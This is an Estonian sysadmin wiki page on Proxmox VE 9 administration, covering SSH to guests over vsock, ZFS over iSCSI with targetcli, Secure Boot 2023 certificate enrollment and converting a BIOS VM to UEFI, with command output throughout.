<pre>
root@unifi-oss:~# ss -a -p --vsock
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
v_str LISTEN 0 0 *:22 *:* users:(("systemd",pid=1,fd=66))
v_str ESTAB 0 0 50056:22 2:3327097366 users:(("sshd-session",pid=914,fd=7),("sshd-session",pid=914,fd=6),("sshd-session",pid=905,fd=7),("sshd-session",pid=905,fd=6),("systemd",pid=1,fd=8))
</pre>

kus

* af_vsock osakonnas on sarnasel af_inet osakonnale ka listen socket ning 'active connected socket'

Tundub, et uuemal ajal on ssh agar kuulama ka af_unix soketil

<pre>
root@unifi-oss:~# screendump | grep -i ssh
[ OK ] Listening on sshd-unix-local.socket - OpenSSH Server Socket (systemd-ssh-generator, AF_UNIX Local).
[ OK ] Listening on sshd-vsock.socket - OpenSSH Server Socket (systemd-ssh-generator, AF_VSOCK).
[ OK ] Reached target ssh-access.target - SSH Access Available.
Starting ssh.service - OpenBSD Secure Shell server...
[ OK ] Started ssh.service - OpenBSD Secure Shell server.
</pre>

ja tõesti, lokaalselt saab arvutisse logida sisse nii

<pre>
root@unifi-oss:~# ssh unix/run/ssh-unix-local/socket
Warning: Permanently added 'unix/run/ssh-unix-local/socket' (ED25519) to the list of known hosts.
Linux unifi-oss 6.12.90+deb13.1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.90-2 (2026-05-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Jun 1 00:16:42 2026 from UNKNOWN

root@unifi-oss:~# w
00:16:44 up 23 min, 3 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/2 - 00:16 1.00s 0.00s ? w
root pts/1 - 00:16 2.00s 0.00s ? ssh unix/run/ssh-unix-local/socket
</pre>

Kasulikud lisamaterjalid

* https://www.auul.pri.ee/wiki/Linux_operatsioonis%C3%BCsteemis_t%C3%B6%C3%B6tab_v%C3%B5rgu%C3%BChendus#systemd_kasutamine_network-proxy_rollis

===Üle vsock ssh kasutamine - Ubuntu 24.04===

Ettevalmistavalt tuleb 22/tcp seadistada käima ainult konkreetselt ip aadressil

<pre>
root@zabbix-pub-01:~# grep ^Liste /etc/ssh/sshd_config
ListenAddress 192.168.10.194

root@zabbix-pub-01:~# systemctl status ssh.service
</pre>

Kusjuures vastav systemd ssh listen osakond jääb nagu on, 0.0.0.0/0 peale

<pre>
root@zabbix-pub-01:~# grep ^Lis /usr/lib/systemd/system/ssh.socket
ListenStream=0.0.0.0:22
</pre>

kus

* väidetavalt on see vajalik mingi sistemise systemd/ssh jne loogika toimimiseks.

ja laadida kerneli moodul

<pre>
root@zabbix-pub-01:~# modprobe vmw_vsock_virtio_transport
</pre>

Ubuntu 24.04 keskkonnas on tehniliselt kõik vajalik vsock kasutamiseks olemas, tuleb lisada kaks system elementi

* sshd-vsock.socket - õpetab systemd pid=1 protsessile kuulama võrgus 22/vsock pordil
* sshd-vsock@.service - õpetab 22/vsock pordile sissetuleva pöördumist üleandmist sshd protsessile

<pre>
root@zabbix-pub-01:~# ls -ld /etc/systemd/system/sshd-vsock*
-rw-r--r-- 1 root root 380 Jun 20 15:38 /etc/systemd/system/sshd-vsock@.service
-rw-r--r-- 1 root root 265 Jun 20 13:33 /etc/systemd/system/sshd-vsock.socket
</pre>

ning

<pre>
root@zabbix-pub-01:~# cat /etc/systemd/system/sshd-vsock.socket
[Unit]
Description=OpenSSH Server Socket (AF_VSOCK Network-Independent Line)
Documentation=man:sshd(8) man:sshd_config(5)
# Notice: No "Conflicts=" or "Before=" entries are needed here!

[Socket]
ListenStream=vsock::22
Accept=yes

[Install]
WantedBy=sockets.target

root@zabbix-pub-01:~# cat /etc/systemd/system/sshd-vsock@.service
[Unit]
Description=OpenSSH Server Socket Per-Connection Daemon (VSOCK Backup)
Documentation=man:sshd(8) man:sshd_config(5)
After=auditd.service

[Service]
EnvironmentFile=-/etc/default/ssh
# The -i flag forces sshd to run in "inetd" mode to accept the raw systemd socket
ExecStart=-/usr/sbin/sshd -i $SSHD_OPTS
StandardInput=socket
RuntimeDirectory=sshd
RuntimeDirectoryMode=0755
</pre>

Käivitamiseks sobib öelda

<pre>
root@zabbix-pub-01:~# systemctl daemon-reload
root@zabbix-pub-01:~# systemctl enable --now sshd-vsock.socket
</pre>

Tulemusena kuulatakse 22/vsock peal

<pre>
root@zabbix-pub-01:~# systemctl list-sockets | grep ssh
192.168.10.194:22 ssh.socket ssh.service
vsock::22 sshd-vsock.socket -
</pre>

===Proxmox VE Firewall===

====Misc====

Probleeme tekitada võiv kombinatsioon, vältida

* Hardware -> network device -> Firewall - Enable
* Firewall -> Option - No

====Kasulikud lisamaterjalid====

* https://pve.proxmox.com/pve-docs-7/chapter-pve-firewall.html

===Misc===

Tundub, et pve 9 ja qemu 11 kandis on hakanud ilmuma 'x86_64 v2 aes' virtuaalse protsessori kasutamisel sellised teated, nt 'host' protsessoriga neid ei ole

<pre>
root@pve-wrx90e:~# pveversion
pve-manager/9.2.3/d0fde103346cf89a (running kernel: 7.0.6-2-pve)

root@pve-wrx90e:~# dmesg | grep WRMSR | tail -n 4
[30021.694536] kvm: kvm [323176]: vcpu0, guest rIP: 0xffffffffb807e744 Unhandled WRMSR(0xc0010007) = 0xffff
[30090.614209] kvm: kvm [324048]: vcpu0, guest rIP: 0xffffffff84e6d9b4 Unhandled WRMSR(0xc0010007) = 0xffff
[30308.798770] kvm: kvm [326811]: vcpu0, guest rIP: 0xffffffff8d67e744 Unhandled WRMSR(0xc0010007) = 0xffff
[180421.745980] kvm: kvm [3632532]: vcpu0, guest rIP: 0xffffffff81242297 Unhandled WRMSR(0xc0010007) = 0xffff
</pre>

===arm64 platvormi emuleerimine===

Tundub, et PVE v. 9.2 juures ilmub webgui peale vcpu valik 'arm (64-bit)'

[[Fail:20260614-pve-01.png|600px]]

kus

* TODO

<pre>
root@pve-svc-02:~# apt-get install pve-edk2-firmware-aarch6
</pre>

===Kasulikud lisamaterjalid===

* TODO

Proxmox v. 9 kasutamine

2026-06-20T14:23:02Z

Imre: /* Üle vsock ssh kasutamine - Ubuntu 24.04 */

===Sissejuhatus===

TODO

===Virtuaalne riistvara===

Klaviatuur ja hiir

<pre>
root@pwrk-02:~# systool -b serio
Bus = "serio"

Device = "serio0"
Device = "serio1"

root@pwrk-02:~# systool -b serio -v
Bus = "serio"

Device = "serio0"
Device path = "/sys/devices/platform/i8042/serio0"
bind_mode = "auto"
description = "i8042 KBD port"
drvctl = <store method only>
err_count = "0"
extra = "0"
firmware_id = "PNP: PNP0303"
force_release = "369-370"
modalias = "serio:ty06pr00id00ex00"
scroll = "0"
set = "2"
softraw = "1"
softrepeat = "0"
uevent = "DRIVER=atkbd
SERIO_TYPE=06
SERIO_PROTO=00
SERIO_ID=00
SERIO_EXTRA=00
MODALIAS=serio:ty06pr00id00ex00
SERIO_FIRMWARE_ID=PNP: PNP0303"

Device = "serio1"
Device path = "/sys/devices/platform/i8042/serio1"
bind_mode = "auto"
description = "i8042 AUX port"
drvctl = <store method only>
firmware_id = "PNP: PNP0f13"
modalias = "serio:ty01pr00id00ex00"
protocol = "VirtualPS/2"
rate = "100"
resetafter = "5"
resolution = "200"
resync_time = "0"
uevent = "DRIVER=psmouse
SERIO_TYPE=01
SERIO_PROTO=00
SERIO_ID=00
SERIO_EXTRA=00
MODALIAS=serio:ty01pr00id00ex00
SERIO_FIRMWARE_ID=PNP: PNP0f13"
</pre>

===remote zfs over iscsi===

====Mõisted====

* FUA (Forced Unit Access) -
* WCE (Write Cache Enable) -
* TPU (Thin Provisioning UNMAP) -
* TPWS (WRITE_SAME / Zeroing) -
* VFS (virtual file system) -

====Tööpõhimõte====

Virtuaalse arvuti vaatest andmetega tegelemine

pve virtuaalne arvuti -> pve füüsiline arvuti -> over-iscsi-zfs-storage-server

Sõltuvalt qemu virtuaalse arvuti virtuaalse plokkseadme 'Cache' seadistustest on võimalik erinevate cache komplektide-kombinatsioonide kasutamine andmete liikumisel virtuaalses arvutis töötava protsessi juurest zfs storage serveri füüsilisele plokkseadmele. Tundub, et 2025 aastal on kõige keskmisemale kasutusele sobiv valik 'Cache: nocache'

* hea jõudlus
* hea terviklus

Andmete liikumise teekond

* virtuaalse arvuti rakendus
* virtuaalse arvuti vfs failisüsteem
* virtuaalse arvuti page cache (vfs'ga seotud)
* virtuaalse arvuti ext4 failisüsteem (ext4 draiver)
* virtuaalse arvuti lvm
* virtuaalse arvuti fdisk partitsioonid
* virtuaalse arvuti virtuaalne sata vms kontroller
* füüsilise arvuti qemu protsess
* füüsilise arvuti open-iscsi poolt teostatud /dev/sda scsi plokkseade (puudub cache)
* füüsilises arvutis storage'ga seotud cache puudub
* storage arvuti targetcli (puutub cache)
* storage arvuti zfs ressurss (sisaldab zfs cache)
* storage avuti füüsilise plokkseadme controller-cache

'Cache: nocache' parameeter on üks vähestest parameetritest, mis avaldab mõju nö mõlemas suunas

* virtuaalse arvuti seest kasutada olevale storage ressursile
* kuidas füüsilise arvuti sees virtuaalsele arvutile vastav qemu protsess kasutab allolevat plokkseadet

Käesolevas tekstis kirjeldatakse nelja komponendi seadistamist

* virtuaalsele arvutile vastav qemu protsess
* iscsi initiator
* iscsi target
* zfs lahendus

====zfs lahendus iscsi target arvutis====

Füüsilised kettad on kasutusel nö kõige tavalisemal viisil, eriti tähendab see, et ketastel on sisselülitatud nö tavaline controller-cache

<pre>
root@pve-svc-02:~# lsscsi -s | grep 4.00T
[2:0:0:0] disk ATA CT4000MX500SSD1 045 /dev/sdc 4.00TB
[3:0:0:0] disk ATA CT4000MX500SSD1 045 /dev/sdd 4.00TB
[N:0:1:1] disk Samsung SSD 990 PRO with Heatsink 4TB__1 /dev/nvme0n1 4.00TB
[N:1:1:1] disk Samsung SSD 990 PRO with Heatsink 4TB__1 /dev/nvme1n1 4.00TB
</pre>

zfs lülituse moodustamine

<pre>
root@pve-svc-02:~# cat create-zpool-raidz1-x4.sh
zpool create -o ashift=13 zp_data raidz1 \
/dev/disk/by-id/ata-CT4000MX500SSD1_2246E686FE58 \
/dev/disk/by-id/ata-CT4000MX500SSD1_2246E686FF7B \
/dev/disk/by-id/nvme-Samsung_SSD_990_PRO_with_Heatsink_4TB_S7DSNJ0X501827B \
/dev/disk/by-id/nvme-Samsung_SSD_990_PRO_with_Heatsink_4TB_S7DSNJ0X501856Z
</pre>

zfs cache töötab tavalisel viisil, st on sisse lülitatud olekus, nt

<pre>
root@pve-svc-02:~# zfs get all | grep -i cache | grep vm-106-disk-0
zp_crucial_mx_4/vm-106-disk-0 primarycache all default
zp_crucial_mx_4/vm-106-disk-0 secondarycache all default
</pre>

====targetcli iscsi target arvutis====

targetcli seadistamine koosneb kahest tegevusest

* zfs põhise alus-storage storage publitseerimine
* publitseerimisel sobivalt scsi protokolli parameetrite kasutamine (eriti cache, sparse jms esitamine)

<pre>
/> /iscsi create iqn.2025-10.moraal.srv:storage.zfstarget
/> /iscsi/iqn.2025-10.moraal.srv:storage.zfstarget/tpg1/acls create iqn.1993-08.org.debian:01:4cbe32bd26b
</pre>

Sobiv seadistus, mis tuleb plokk-ressursi jaoks kehtestada

<pre>
root@pve-svc-02:~# targetcli /backstores/block/zp_crucial_mx_4-vm-108613-disk-4 get attribute | grep =
======================
alua_support=1
block_size=512
emulate_3pc=1
emulate_caw=1
emulate_dpo=1
emulate_fua_read=1
emulate_fua_write=1
emulate_model_alias=1
emulate_pr=1
emulate_rest_reord=0
emulate_rsoc=1
emulate_tas=1
emulate_tpu=0
emulate_tpws=0
emulate_ua_intlck_ctrl=0
emulate_write_cache=0
enforce_pr_isids=1
force_pr_aptpl=0
hw_block_size=512 [ro]
hw_max_sectors=32768 [ro]
hw_pi_prot_type=0 [ro]
hw_queue_depth=128 [ro]
is_nonrot=1
max_unmap_block_desc_count=1
max_unmap_lba_count=131072
max_write_same_len=65535
optimal_sectors=32768
pgr_support=1
pi_prot_format=0
pi_prot_type=0
pi_prot_verify=0
queue_depth=128
submit_type=0
unmap_granularity=8
unmap_granularity_alignment=0
unmap_zeroes_data=0
</pre>

kus

* TODO

Muudatuse tegemine

<pre>
/backstores/b...108613-disk-4> set attribute emulate_tpws=0
/backstores/b...108613-disk-4> set attribute emulate_tpu=0
</pre>

Kasutamine paistab välja selline

<pre>
root@pve-svc-02:~# targetcli
targetcli shell version 2.1.53
Copyright 2011-2013 by Datera, Inc and others.
For help on commands, type 'help'.

/> ls
o- / ......................................................................................................................... [...]
o- backstores .............................................................................................................. [...]
| o- block .................................................................................................. [Storage Objects: 3]
| | o- zp_crucial_mx_4-vm-100-disk-0 ......................... [/dev/zp_crucial_mx_4/vm-100-disk-0 (20.0GiB) write-thru activated]
| | | o- alua ................................................................................................... [ALUA Groups: 1]
| | | o- default_tg_pt_gp ....................................................................... [ALUA state: Active/optimized]
| | o- zp_crucial_mx_4-vm-106-disk-5 ......................... [/dev/zp_crucial_mx_4/vm-106-disk-5 (16.0GiB) write-thru activated]
| | | o- alua ................................................................................................... [ALUA Groups: 1]
| | | o- default_tg_pt_gp ....................................................................... [ALUA state: Active/optimized]
| | o- zp_crucial_mx_4-vm-108613-disk-1 .................... [/dev/zp_crucial_mx_4/vm-108613-disk-1 (4.0GiB) write-thru activated]
| | o- alua ................................................................................................... [ALUA Groups: 1]
| | o- default_tg_pt_gp ....................................................................... [ALUA state: Active/optimized]
| o- fileio ................................................................................................. [Storage Objects: 0]
| o- pscsi .................................................................................................. [Storage Objects: 0]
| o- ramdisk ................................................................................................ [Storage Objects: 0]
o- iscsi ............................................................................................................ [Targets: 1]
| o- iqn.2025-10.moraal.srv:storage.zfstarget .......................................................................... [TPGs: 1]
| o- tpg1 ............................................................................................... [no-gen-acls, no-auth]
| o- acls .......................................................................................................... [ACLs: 1]
| | o- iqn.1993-08.org.debian:01:4cbe32bd26b ................................................................ [Mapped LUNs: 3]
| | o- mapped_lun0 ...................................................... [lun0 block/zp_crucial_mx_4-vm-108613-disk-1 (rw)]
| | o- mapped_lun1 ......................................................... [lun1 block/zp_crucial_mx_4-vm-106-disk-5 (rw)]
| | o- mapped_lun2 ......................................................... [lun2 block/zp_crucial_mx_4-vm-100-disk-0 (rw)]
| o- luns .......................................................................................................... [LUNs: 3]
| | o- lun0 .............. [block/zp_crucial_mx_4-vm-108613-disk-1 (/dev/zp_crucial_mx_4/vm-108613-disk-1) (default_tg_pt_gp)]
| | o- lun1 .................... [block/zp_crucial_mx_4-vm-106-disk-5 (/dev/zp_crucial_mx_4/vm-106-disk-5) (default_tg_pt_gp)]
| | o- lun2 .................... [block/zp_crucial_mx_4-vm-100-disk-0 (/dev/zp_crucial_mx_4/vm-100-disk-0) (default_tg_pt_gp)]
| o- portals .................................................................................................... [Portals: 1]
| o- 0.0.0.0:3260 ..................................................................................................... [OK]
o- loopback ......................................................................................................... [Targets: 0]
o- srpt ............................................................................................................. [Targets: 0]
o- vhost ............................................................................................................ [Targets: 0]
o- xen-pvscsi ....................................................................................................... [Targets: 0]
/>
</pre>

Lisaks saab portaali käest küsida attribute ja parameter komplekte, nt

<pre>
root@pm60-trt:~# targetcli /iscsi/iqn.2022-09.ee.moraal:pbs-pub/tpg1 get parameter | grep =
======================
AuthMethod=CHAP
DataDigest=CRC32C,None
DataPDUInOrder=Yes
DataSequenceInOrder=Yes
DefaultTime2Retain=20
DefaultTime2Wait=2
ErrorRecoveryLevel=0
FirstBurstLength=65536
HeaderDigest=CRC32C,None
IFMarkInt=Reject
IFMarker=No
ImmediateData=Yes
InitialR2T=Yes
MaxBurstLength=262144
MaxConnections=1
MaxOutstandingR2T=1
MaxRecvDataSegmentLength=8192
MaxXmitDataSegmentLength=262144
OFMarkInt=Reject
OFMarker=No
TargetAlias=LIO Target

root@pm60-trt:~# targetcli /iscsi/iqn.2022-09.ee.moraal:pbs-pub/tpg1 get attribute | grep =
======================
authentication=1
cache_dynamic_acls=0
default_cmdsn_depth=64
default_erl=0
demo_mode_discovery=1
demo_mode_write_protect=1
fabric_prot_type=0
generate_node_acls=0
login_keys_workaround=1
login_timeout=15
prod_mode_write_protect=0
t10_pi=0
tpg_enabled_sendtargets=1
root@pm60-trt:~#
</pre>

kus

* parameter - võrgus kõneldavad asjad
* attribute - lokaalselt olukorda määratlevad asjad

====iscsi initiator====

TODO

====qemu protsess====

Kasutamine

[[Fail:20251019-remote-zfs-over-iscsi-01.png|600px]]

====Kasulikud lisamaterjalid====

TODO

===Secure boot - nn Microsoft 2023 sertifikaat===

====Tööpõhimõte====

TODO

====Olemasolev olukord enne muudatust====

<pre>
root@pwrk-01:~# apt-get install efitools
root@pwrk-01:~# (printf "db: \n"; efi-readvar -v db; printf "\nKEK: \n"; efi-readvar -v KEK) | grep -E "2011|2023"
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Windows Production PCA 2011
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Corporation UEFI CA 2011
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Corporation KEK CA 2011
</pre>

====Muudatus====

<pre>
root@pve-wrx90e:~# qm enroll-efi-keys 902198
skipping - OS type is neither Windows 10 nor Windows 11

root@pve-wrx90e:~# qm set 902198 --ostype win10
root@pve-wrx90e:~# qm enroll-efi-keys 902198
root@pve-wrx90e:~# qm set 902198 --ostype l26
</pre>

ja

<pre>
from

efidisk0: si-dpool:vm-902198-disk-0,efitype=4m,pre-enrolled-keys=1,size=1M

to

efidisk0: si-dpool:vm-902198-disk-0,efitype=4m,ms-cert=2023w,pre-enrolled-keys=1,size=1M
</pre>

====Uus olukord peale muudatust====

<pre>
root@pwrk-02:~# (printf "db: \n"; efi-readvar -v db; printf "\nKEK: \n"; efi-readvar -v KEK) | grep -E "2011|2023"
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Windows Production PCA 2011
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Corporation UEFI CA 2011
C=US, O=Microsoft Corporation, CN=Microsoft UEFI CA 2023
C=US, O=Microsoft Corporation, CN=Windows UEFI CA 2023
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Corporation KEK CA 2011
</pre>

====WebGUI abil====

WebGUI abil vm sertifikaat muudatus

Disk Action -> Enroll Updated Certificates

[[Fail:20260611-pve-ms-cert-2023-01.png|700px]]

kus

* TODO

===Misc===

====pveupdate====

* uuendab webgui liidese sertifikaadi

<pre>
root@pve-wrx90e:~# pveupdate
Loading ACME account details
Placing ACME order
Order URL: https://acme-v02.api.letsencrypt.org/acme/order/2232348225/504476182801

Getting authorization details from 'https://acme-v02.api.letsencrypt.org/acme/authz/2232348225/694056506271'
The validation for pve-wrx90e.auul.pri.ee is pending!
Setting up webserver
Triggering validation
Sleeping for 5 seconds
Status is 'valid', domain 'pve-wrx90e.auul.pri.ee' OK!

All domains validated!

Creating CSR
Checking order status
Order is ready, finalizing order
valid!

Downloading certificate
Setting pveproxy certificate and key
Restarting pveproxy
Revoking old certificate
Revoke request to CA failed: Error: POST to https://acme-v02.api.letsencrypt.org/acme/revoke-cert
{
"type": "urn:ietf:params:acme:error:unauthorized",
"detail": "Unable to revoke :: Certificate is expired",
"status": 403
}
</pre>

====pveupgrade====

* uuendab süsteemi apt paketihaldusega tarkvara

===BIOS arvuti teisendamine UEFI arvutiks===

====Tööpõhimõte====

Peamised kaalutlused BIOS arvuti teisendamisel UEFI arvutiks

* vajadus saada osa secure boot lahendusega kaasnevast turvalisusest
* nö täieline reinstall oleks liiga aeganõudev, kohmakas jne

Muudatus seisneb virtuaalsele arvutile täiendava nö esimese plokkseadme lisamisel, suurusega 1 G. Sinna moodustatakse gpt partitsioonitabel ning vfat failisüsteem, ja ta vastab nö kataloogile /boot/efi, sinna ta ka monteeritakse kokkuvõttes. Juurfailisüsteem ja muu jääb sinna kus ta seni on olnud. Oluline on, et muudatuse käigus ei muudeta olemasoleva plokkseadme partitsioonitabelit ega lvm vms, st ebaõnnestumisel saab pöörduda tagasi kergesti (varundus peaks aga siiski olema olemas).

====Muudatuse protseduur====

Enne muudatust paistab virtuaalne arvuti selline

[[Fail:20260516-from-bios-to-uefi-01.png|700px]]

ning

<pre>
# df -T -h -t ext4
Failisüsteem Tüüp Maht Kasut Vaba Kas% Haagitud
/dev/mapper/system-root ext4 11G 8,2G 2,2G 80% /
/dev/vda1 ext4 462M 325M 109M 75% /boot
</pre>

Lisatakse töötavale arvutile 1 g plokkseade

Hardware -> Add disk -> ...

Veendutakse, mis on konkreetsel juhtumil 1 g lisatud plokkseadme nimi, nt

<pre>
# fdisk /dev/vdb -l
Disk /dev/vdb: 1 GiB, 1073741824 bytes, 2097152 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
</pre>

edasi käsundamine

<pre>
# apt-get install parted

# parted /dev/vdb mklabel gpt
# parted /dev/vdb mkpart primary fat32 1MiB 100%
# parted /dev/vdb set 1 esp on
# mkfs.vfat -F 32 /dev/vdb1
# mkdir -p /boot/efi
# blkid /dev/vdb1
</pre>

Muuta /etc/fstab faili, st lisada üks rida olemaoleva /boot rea alla, uuid on mitte partitsiooni, aga vfat failisüsteemi

<pre>
# cat /etc/fstab
..
UUID=XXXX-XXXX /boot/efi vfat defaults 0 2
</pre>

Lisada paketid

<pre>
# systemctl daemon-reload
# mount /boot/efi
# apt update
# apt install grub-efi-amd64-signed shim-signed mokutil
# grub-install --target=x86_64-efi --efi-directory=/boot/efi --bootloader-id=debian --removable
# update-grub
</pre>

tulemusena

<pre>
# find /boot/efi/ -type f -ls
115 932 -rwxr-xr-x 1 root root 952384 mai 17 12:00 /boot/efi/EFI/BOOT/BOOTX64.EFI
116 2624 -rwxr-xr-x 1 root root 2685544 mai 17 12:00 /boot/efi/EFI/BOOT/grubx64.efi
117 832 -rwxr-xr-x 1 root root 851368 mai 17 12:00 /boot/efi/EFI/BOOT/mmx64.efi
118 4 -rwxr-xr-x 1 root root 112 mai 17 12:00 /boot/efi/EFI/BOOT/BOOTX64.CSV
119 4 -rwxr-xr-x 1 root root 112 mai 17 12:00 /boot/efi/EFI/BOOT/grub.cfg

# cat /boot/efi/EFI/BOOT/grub.cfg
search.fs_uuid 5ebbc6f0-69e8-413b-bb4f-4ec0fa5d2fc1 root
set prefix=($root)'/grub'
configfile $prefix/grub.cfg

# blkid /dev/vda1
/dev/vda1: UUID="5ebbc6f0-69e8-413b-bb4f-4ec0fa5d2fc1" BLOCK_SIZE="1024" TYPE="ext4" PARTUUID="cfa36d3a-01"
</pre>

Õeldakse virtuaalsele arvutile poweroff ja muudetakse seadistusi

* lisatakse 'EFI Disk' (virtuaalne efi riistvara seadistuste salvestamine jms)
* muudetakse bios -> uefi
* muudetakse chipset i440fx -> q35
* muudetakse display default -> virtio-gpu

Peale muudatust paistab virtuaalne arvuti selline

[[Fail:20260516-from-bios-to-uefi-02.png|700px]]

Lisaks on boot järjekorra seadmed muudetud

[[Fail:20260516-from-bios-to-uefi-03.png|700px]]

kus

* tingimata vajalik on virtio1 ja virtio0 - esimesel on bootload ja grub.cfg lühike konf, teisel on konfi sisuline osa

Tulemusena töötab arvuti uefi secure boot režiimis

<pre>
# mokutil --sb-state
SecureBoot enabled

# df -t vfat -t ext4 -T -h
Failisüsteem Tüüp Maht Kasut Vaba Kas% Haagitud
/dev/mapper/system-root ext4 11G 8,2G 2,2G 80% /
/dev/vda1 ext4 462M 325M 109M 75% /boot
/dev/vdb1 vfat 1020M 8,7M 1012M 1% /boot/efi
</pre>

Kõige lõpus võiks veel öelda, nii tekivad nö naturaalsed efibootmgr ja /boot/efi sissekanded nagu nad oleks seal nö sündinud-uefi'na arvutil

<pre>
# efibootmgr
BootCurrent: 0002
Timeout: 3 seconds
BootOrder: 0002,0003,0000,0001
Boot0000* BootManagerMenuApp FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(eec25bdc-67f2-4d95-b1d5-f81b2039d11d)
Boot0001* EFI Firmware Setup FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(462caa21-7614-4503-836e-8ab6f4662331)
Boot0002* UEFI Misc Device PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0xb,0x0){auto_created_boot_option}
Boot0003* UEFI Misc Device 2 PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0xa,0x0){auto_created_boot_option}

# grub-install /dev/vdb
Installing for x86_64-efi platform.
Installation finished. No error reported.

# efibootmgr
BootCurrent: 0002
Timeout: 3 seconds
BootOrder: 0004,0002,0003,0000,0001
Boot0000* BootManagerMenuApp FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(eec25bdc-67f2-4d95-b1d5-f81b2039d11d)
Boot0001* EFI Firmware Setup FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(462caa21-7614-4503-836e-8ab6f4662331)
Boot0002* UEFI Misc Device PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0xb,0x0){auto_created_boot_option}
Boot0003* UEFI Misc Device 2 PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0xa,0x0){auto_created_boot_option}
Boot0004* debian HD(1,GPT,0fb8cfd1-c90b-4da2-97db-ceda14464a90,0x800,0x1ff000)/File(\EFI\proxmox\shimx64.efi)
</pre>

====Boot Order märkused====

PVE webgui Boot Order määrab kaks

* millised plokkseadmed osalevad uefi faasis
* millised järjekorras plokkseadmed osalevad uefi faasis alglaadimisel

Kui on linnutatud ainult üks seade

[[Fail:20260516-from-bios-to-uefi-05.png|800px]]

Kui on linnutatud ainult kaks seadet

[[Fail:20260516-from-bios-to-uefi-04.png|800px]]

Antud juhul on see väga oluline kuna grub alglaadur on kahel seadmel laiali

* grub.efi rakendus asub /dev/vdb
* grub.conf seadistus asub /dev/vda

Kui Boot Order on linnutatud vaid /dev/vda, siis peatub arvuti käivitumine 'grub>' prompt juures. Selles mõttes võiks olla PVE webgui osakonna nimeks nt 'UEFI device visibility and Boot Order'.

===Üle vsock ssh kasutamine - Ubuntu 26.04 ja Debian v. 13===

Osutub, et uuemal ajal, st PVE v. 9, Debian v. 13 virtuaalne avuti on võimalik PVE host pealt pöörduda guest poole üle ssh kasutades vsock protokolli (mitte tavalist tcp/ip protokollil põhinevat võrku). Selleks tuleb virtuaalsele arvutile lisada PVE platvormi poolt vsock tugi

<pre>
root@pve-wrx90e:~# head -n 1 /etc/pve/qemu-server/50056.conf
args: -device vhost-vsock-pci,guest-cid=50056
</pre>

ja virtuaalsel arvutil peab olema tarkvaraline vsock tugi. Nt Debian v. 13 puhul on sshd serverisse see integreeritud

<pre>
root@unifi-oss:~# systemctl | grep ssh
ssh.service loaded active running OpenBSD Secure Shell server
sshd@2-50056:22-2:3327097365.service loaded active running OpenBSD Secure Shell server per-connection daemon (vsock:2:3327097364)
system-sshd.slice loaded active active Slice /system/sshd
sshd-unix-local.socket loaded active listening OpenSSH Server Socket (systemd-ssh-generator, AF_UNIX Local)
sshd-vsock.socket loaded active listening OpenSSH Server Socket (systemd-ssh-generator, AF_VSOCK)
ssh-access.target loaded active active SSH Access Available
</pre>

kus

* systemd-ssh-generator on selline süsteem, mis käigult avastab süsteemi võimekusi ja vastavalt seadistab teenustele omadusi (nt ssh puhul lülitatakse sisse vsock tugi)

ning

<pre>
root@unifi-oss:~# systemctl status sshd@2-50056:22-2:3327097365.service
● sshd@2-50056:22-2:3327097365.service - OpenBSD Secure Shell server per-connection daemon (vsock:2:3327097365)
Loaded: loaded (/usr/lib/systemd/system/sshd@.service; static)
Active: active (running) since Mon 2026-06-01 00:04:39 EEST; 16s ago
Invocation: 84acdad56690460e8e0fbffd2ecd4d69
TriggeredBy: ● sshd-vsock.socket
Docs: man:sshd(8)
man:sshd_config(5)
Main PID: 876 (sshd-session)
Tasks: 1 (limit: 6978)
Memory: 1.8M (peak: 3.9M)
CPU: 27ms
CGroup: /system.slice/system-sshd.slice/sshd@2-50056:22-2:3327097365.service
‣ 876 "sshd-session: root [priv]"

Jun 01 00:04:39 unifi-oss systemd[1]: Started sshd@2-50056:22-2:3327097365.service - OpenBSD Secure Shell server per-connection daemon (vsock:2:3327097365).
Jun 01 00:04:40 unifi-oss sshd-session[876]: Accepted publickey for root from UNKNOWN port 65535 ssh2: ED25519 SHA256:3cj7QCk4leNOSQJlfeUeHr6YfsA0r3bRUqZS9Rey3jM
Jun 01 00:04:40 unifi-oss sshd-session[876]: pam_unix(sshd:session): session opened for user root(uid=0) by root(uid=0)
</pre>

kus

* triggered by 'sshd-vsock.socket'

ssh kliendi st pve host poolel peab olema teadmine, kuidas käituda kui üritatakse kasutada vsock protokolli üle sshd serverit

<pre>
root@pve-wrx90e:~# cat /lib/systemd/ssh_config.d/20-systemd-ssh-proxy.conf
# SPDX-License-Identifier: LGPL-2.1-or-later
#
# Allow connecting to the local host directly via ".host"
Host .host machine/.host
ProxyCommand /usr/lib/systemd/systemd-ssh-proxy unix/run/ssh-unix-local/socket %p
ProxyUseFdpass yes
CheckHostIP no

# Make sure unix/* and vsock/* can be used to connect to AF_UNIX and AF_VSOCK paths.
# Make sure machine/* can be used to connect to local machines registered in machined.
#
Host unix/* vsock/* machine/*
ProxyCommand /usr/lib/systemd/systemd-ssh-proxy %h %p
ProxyUseFdpass yes
CheckHostIP no

